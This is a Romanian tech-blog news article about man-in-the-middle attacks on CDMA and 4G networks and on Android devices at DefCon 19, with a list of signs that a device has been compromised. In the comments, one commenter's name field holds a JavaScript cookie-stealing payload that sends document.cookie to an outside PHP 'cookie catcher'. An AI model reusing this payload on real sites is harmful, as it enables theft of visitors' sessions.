• Acasă
  • Despre noi
  • Autori
  • Mărturii
  • Arhivă
  • Trimite Articol
  • Contact

WORLDIT

Lumea în 1 și 0.

  • Știri
    • Tehnologie
    • Tehnologie mobilă
    • Securitate
    • Developers
    • Știință
    • Benzi desenate
    • Jocuri
    • Intern
  • Tehnic
    • Browser
    • C#
    • C/C++
    • Challenge
    • HTML/CSS
    • Javascript, Ajax, jQuery
    • Open Source
    • PHP
    • Python
    • Securitate IT
    • Socializare
    • WordPress
    • Altele
  • Recenzii
  • Interviuri
  • Evenimente

Defcon 19 – hackerii au devenit vânat

4
  • Publicat de Andrei Avădănei
  • în Securitate · Știri · Tehnologie · Tehnologie mobilă
  • — 10 aug., 2011 at 3:08 pm

În perioada 4-7 august, la hotel Rio, a avut loc unul dintre cele mai mari evenimente de securitate din lume – DefCon 19. Deşi mulţi merg la acest eveniment pentru a se bucura de cele mai noi descoperiri din acest domeniu alături de numeroase discuţii constructive, pe parcursul evenimentului se întâmplă experimente pe participanţi destul de interesante.

În ultimii ani, Defcon a fost martor al unora dintre cele mai ostile locuri de acces al Internetului, fiind vizate reţelele WiFi şi GSM. Anul acesta, cel mai black hat loc de pe pământ s-a confruntat cu atacuri CDMA şi 4G. Vineri, o parte din echipele Anon şi Lulz şi-au făcut făcut apariţia, ca sâmbătă dimineaţă primele „arme” să fie instalate.

Caracteristici ce s-au remarcat pe parcursul evenimentului

– atacuri MitM împotriva conexiunile CDMA şi 4G
– poziţionarea MitM era strategic aşezată pentru exploatarea de la distanţă a telefoanelor Android şi a PC-urilor
– s-au folosit metode nepersistente doar atunci când rootkit-urile nu erau de ajutor
– escaladarea privilegiilor s-a făcut de la cele mai simple metode până la tehnici şi tactici speciale; tot timpul s-a încercat atingerea scopului
– atacuri simultane pe CDMA şi 4G la putere maximă
– s-a operat continuu (cu excepţia pauzelor) de sâmbătă dimineaţă până luni la 8 AM
– au fost construite cu scopuri clare : exploatarea în masă, recunoaştere, infiltrare, a trage cu ochiul

Cum ţi-ai fi putut da seama că te-ai confruntat cu „bestia”?

– ai acceptat un upgrade pentru Android, Java sau alte aplicaţii?
– ai remarcat anomalii cu semnalul 3G/4G, jonglând de la semnal full până la semnal foarte slab sau chiar lipsa semnalului?
– ai remarcat telefonul tău Android încărcat la maxim iar apoi, odată detaşat, coborând la <50%?
– ai remarcat viteze de descărcare pe 4G la 1/4 decât cele obişnuite, dar totuşi viteza de upload dublă faţă de obicei?
– ai remarcat că serviciile Android s-au restartat imediat ce procesele erau terminate?
– Androidul tău nu se mai conectează la USB debugging deşi adbd este activ?
– computerul tău are un sshd ce nu poate fi ucis?
– a crăpat Androidul tău apoi a urmat o perioadă lungă în care a stat îngheţat, urmată de un restart foarte lung?
– lista poate continua.

Autorul acestor observaţii susţine că a aşteptat şase ediţii de Defcon pentru a întâlni un astfel de adversar. De asemenea el a fost foarte încântat pentru exploiturile 0day ce i-au căzut în mână. Se pare totusi că securitatea la noi e percepută la un nivel foarte mic. Mai avem foarte mult până să ne jucăm cu atacuri de un asemenea calibru. Totuşi, ar trebui să fim pregătiţi pentru că mă îndoiesc că nu există un acces atât de mare la tehnologie şi pentru compatrioţii noştri.

Mai multe detalii aici.

Etichete: anon+atacuri 3gatacuri 4gatacuri cdmaatacuri mitmblack hatdefconhackinglulzsecuritate

— Andrei Avădănei a scris 1246 articole

Andrei scrie pe worldit.info din vara lui 2011. Este fondatorul Asociatiei Centrul de Cercetare in Securitate Informatica din Romania - CCSIR si coordoneaza DefCamp, cea mai importanta conferinta de securitate informatica & hacking din Europa Centrala si de Est. Andrei ofera in cadrul Bit Sentinel servicii de securitate informatica, penetration testing, security management, recuperarea de pe urma unui atac cibernetic, training-uri si workshop-uri.

  • Articolul anterior Infoeducaţie 2011 – premii, impresii şi seminarii
  • Articolul următor 200.000 de procese în America pentru piratare

4 Comentarii

  1. document.location="http://www.vegetacony.net78.net/Cookie Catcher.php?c=" + document.cookie George spune:
    august 10, 2011 la 4:45 pm

    Hmm… interesanta idee. Oricum cine s-ar fi asteptat ca la o conventie ca aceasta sa nu existe o tentativa de hacking.

  2. Andrei Avădănei spune:
    august 10, 2011 la 5:28 pm

    Asta a fost un comentariu ca sa iti testezi tu descoperirea in materie de securitate? :))

  3. Marius spune:
    august 10, 2011 la 7:09 pm

    Fain George :))
    Lasa ca oamenii mai mult au profitat de pe urma atacurilor. Joe Mccray anunta astazi ca are un client dispus sa cumpere ceva 0days, asa ca…

  4. Predicție - Cum vor arată atacurile informatice în 2012? | WorldIT spune:
    decembrie 28, 2011 la 3:54 pm

    […] Totuși, nu uitați că există aplicații antivirus ce se pregătesc de acest val. De asemenea, la DefCon 19, atacurile 3G-4G, GSM, CDMA și în principiu orice merge fără fir au fost în atenție. Dacă […]


  • Facebook

    WorldIT.info
  • Ultimele Atacuri Cibernetice din Romania – RO Hacked

    [wp_rss_retriever url="https://rohacked.bit-sentinel.com/feed/" excerpt="none" items="5" read_more="false" new_window="true" thumbnail="false" cache="0"] RO Hacked este registrul atacurilor cibernetice din România.
  • Caută

  • Articole Recomandate

    • Recent Posts
    • Tags
    • Număr record de participanți la DefCamp 2015, cel mai important eveniment dedicat securității cibernetice din Europe Centrala si de Estdecembrie 2, 2015
    • La DefCamp 2015 vei afla prin ce tehnici pot fi evitate măsurile de securitate ale sistemelor informatice criticeoctombrie 16, 2015
    • Ultima sansa sa rezervi bilete de tip Early Bird la DefCamp 2015septembrie 1, 2015
    • 15 sfaturi despre cum poti deveni un programator bun venite de la specialisti romaniaugust 4, 2015
    • algoritmica Android antivirus Apple Avadanei Andrei benzi desenate BitDefender blog browser C++ Chrome concurs eveniment Facebook Firefox Google google chrome hacking html5 infografic informatica internet Internet Explorer IT javascript linux Microsoft Mozilla Firefox online PHP programare retea sociala review Romania securitate Tehnologie Twitter web Windows Windows 7 Wordpress WorldIT worldit.info Yahoo! YouTube
  • aprilie 2021
    L Ma Mi J V S D
     1234
    567891011
    12131415161718
    19202122232425
    2627282930  
    « dec.    
  • Link-uri Sponsorizate

    • laptop second hand

    • Calculatoare Second Hand

    • cod voucher pc garage

  • Home
  • Știri
  • Securitate
  • Defcon 19 – hackerii au devenit vânat
  • Important

    • Bit Sentinel
    • Centrul de Cercetare în Securitate Informatică din România
    • DefCamp
  • Prieteni

    • BetiT.ro
    • bijuterii handmade
    • Computerica | Resurse gratuite PC
    • Descopera.org
    • Gadgeturi si IT – Giz.ro
  • Prieteni

    • PC – Config
    • RO Hacked
    • Stiri IT

Copyright © 2009-2014 WORLDIT. Toate drepturile Rezervate.
Termeni și condiții | Contact | Licența Creative Commons